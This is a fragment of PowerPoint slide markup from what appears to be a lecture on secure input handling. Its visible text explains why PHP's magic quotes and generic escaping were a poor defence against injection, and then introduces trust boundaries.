              <a:ext cx="285750" cy="285750"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="33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nl-NL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39281" name="Freeform 41"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3094038" y="1935163"/>
              <a:ext cx="1179512" cy="3578225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 510838 w 1179443"/>
                <a:gd name="T1" fmla="*/ 0 h 3578087"/>
                <a:gd name="T2" fmla="*/ 1081375 w 1179443"/>
                <a:gd name="T3" fmla="*/ 212203 h 3578087"/>
                <a:gd name="T4" fmla="*/ 1107921 w 1179443"/>
                <a:gd name="T5" fmla="*/ 490730 h 3578087"/>
                <a:gd name="T6" fmla="*/ 1081375 w 1179443"/>
                <a:gd name="T7" fmla="*/ 875358 h 3578087"/>
                <a:gd name="T8" fmla="*/ 577183 w 1179443"/>
                <a:gd name="T9" fmla="*/ 1445664 h 3578087"/>
                <a:gd name="T10" fmla="*/ 245459 w 1179443"/>
                <a:gd name="T11" fmla="*/ 1657867 h 3578087"/>
                <a:gd name="T12" fmla="*/ 484292 w 1179443"/>
                <a:gd name="T13" fmla="*/ 2307755 h 3578087"/>
                <a:gd name="T14" fmla="*/ 789470 w 1179443"/>
                <a:gd name="T15" fmla="*/ 1525240 h 3578087"/>
                <a:gd name="T16" fmla="*/ 948685 w 1179443"/>
                <a:gd name="T17" fmla="*/ 1485450 h 3578087"/>
                <a:gd name="T18" fmla="*/ 1094648 w 1179443"/>
                <a:gd name="T19" fmla="*/ 1856818 h 3578087"/>
                <a:gd name="T20" fmla="*/ 975231 w 1179443"/>
                <a:gd name="T21" fmla="*/ 2055755 h 3578087"/>
                <a:gd name="T22" fmla="*/ 749671 w 1179443"/>
                <a:gd name="T23" fmla="*/ 2453655 h 3578087"/>
                <a:gd name="T24" fmla="*/ 709863 w 1179443"/>
                <a:gd name="T25" fmla="*/ 2586275 h 3578087"/>
                <a:gd name="T26" fmla="*/ 338350 w 1179443"/>
                <a:gd name="T27" fmla="*/ 2559757 h 3578087"/>
                <a:gd name="T28" fmla="*/ 152589 w 1179443"/>
                <a:gd name="T29" fmla="*/ 2069021 h 3578087"/>
                <a:gd name="T30" fmla="*/ 19899 w 1179443"/>
                <a:gd name="T31" fmla="*/ 2281223 h 3578087"/>
                <a:gd name="T32" fmla="*/ 272005 w 1179443"/>
                <a:gd name="T33" fmla="*/ 2612807 h 3578087"/>
                <a:gd name="T34" fmla="*/ 603709 w 1179443"/>
                <a:gd name="T35" fmla="*/ 2891315 h 3578087"/>
                <a:gd name="T36" fmla="*/ 616982 w 1179443"/>
                <a:gd name="T37" fmla="*/ 3580985 h 35780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9443"/>
                <a:gd name="T58" fmla="*/ 0 h 3578087"/>
                <a:gd name="T59" fmla="*/ 1179443 w 1179443"/>
                <a:gd name="T60" fmla="*/ 3578087 h 35780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9443" h="3578087">
                  <a:moveTo>
                    <a:pt x="510208" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="745434" y="65156"/>
                    <a:pt x="980661" y="130313"/>
                    <a:pt x="1080052" y="212035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179443" y="293757"/>
                    <a:pt x="1106556" y="379896"/>
                    <a:pt x="1106556" y="490331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1106556" y="600766"/>
                    <a:pt x="1168400" y="715618"/>
                    <a:pt x="1080052" y="874644"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="991704" y="1033670"/>
                    <a:pt x="715617" y="1314174"/>
                    <a:pt x="576469" y="1444487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437321" y="1574800"/>
                    <a:pt x="260626" y="1512957"/>
                    <a:pt x="245165" y="1656522"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229704" y="1800087"/>
                    <a:pt x="393148" y="2327966"/>
                    <a:pt x="483704" y="2305879"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="574260" y="2283792"/>
                    <a:pt x="711200" y="1660939"/>
                    <a:pt x="788504" y="1524000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="865808" y="1387061"/>
                    <a:pt x="896730" y="1429027"/>
                    <a:pt x="947530" y="1484244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="998330" y="1539461"/>
                    <a:pt x="1088887" y="1760331"/>
                    <a:pt x="1093304" y="1855305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1097721" y="1950279"/>
                    <a:pt x="1031460" y="1954696"/>
                    <a:pt x="974034" y="2054087"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="916608" y="2153478"/>
                    <a:pt x="792921" y="2363305"/>
                    <a:pt x="748747" y="2451653"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="704573" y="2540001"/>
                    <a:pt x="777461" y="2566504"/>
                    <a:pt x="708991" y="2584174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="640521" y="2601844"/>
                    <a:pt x="430695" y="2643809"/>
                    <a:pt x="337930" y="2557670"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245165" y="2471531"/>
                    <a:pt x="205409" y="2113723"/>
                    <a:pt x="152400" y="2067340"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99391" y="2020957"/>
                    <a:pt x="0" y="2188818"/>
                    <a:pt x="19878" y="2279374"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39756" y="2369931"/>
                    <a:pt x="174486" y="2509079"/>
                    <a:pt x="271669" y="2610679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368852" y="2712279"/>
                    <a:pt x="545548" y="2727739"/>
                    <a:pt x="602974" y="2888974"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="660400" y="3050209"/>
                    <a:pt x="609600" y="3461026"/>
                    <a:pt x="616226" y="3578087"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:cu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3" name="Trapezoid 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4572000" y="5357813"/>
              <a:ext cx="571500" cy="214312"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 54773"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Down Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2077018" y="5627688"/>
            <a:ext cx="1306909" cy="500062"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 68853"/>
              <a:gd name="adj2" fmla="val 50000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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>output</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2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2" name="Down Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="599032" y="5617369"/>
            <a:ext cx="1306909" cy="500062"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 68853"/>
              <a:gd name="adj2" fmla="val 50000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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>output</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2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400" dirty="0" err="1" smtClean="0"/>
              <a:t>History</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>sanitisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> in PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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61288" cy="5328591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nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> escape single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> double quote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null</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Magic quotes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>introduced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in PHP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> default in PHP3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> 4:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> user parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>automatically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>escaped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>calling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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addslashes</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>good</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>idea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifferent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>needed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> different SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dialects</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>eg  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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my_sql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-N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nl-NL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pg_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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dirty="0" err="1" smtClean="0"/>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="85725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nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifferent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>languages</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>eg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>maybe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>needs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a: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dirty="0" err="1" smtClean="0"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>escaped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a: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dirty="0" err="1" smtClean="0"/>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>,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not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>?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nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programmer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sense of security</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Magic quotes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>were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removed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in PHP5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Moral</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> story: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>one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generic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sanitisation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mechanism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for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all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inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>suspicious</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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05C5277-9A9A-4E47-9AE7-160D6921F89B}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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45551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52" y="2780929"/>
            <a:ext cx="4061579" cy="3287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Trust-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> &amp; chokepoints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Identifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>boundary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/>
              <a:t>useful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decide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>where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validate</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>network</a:t>
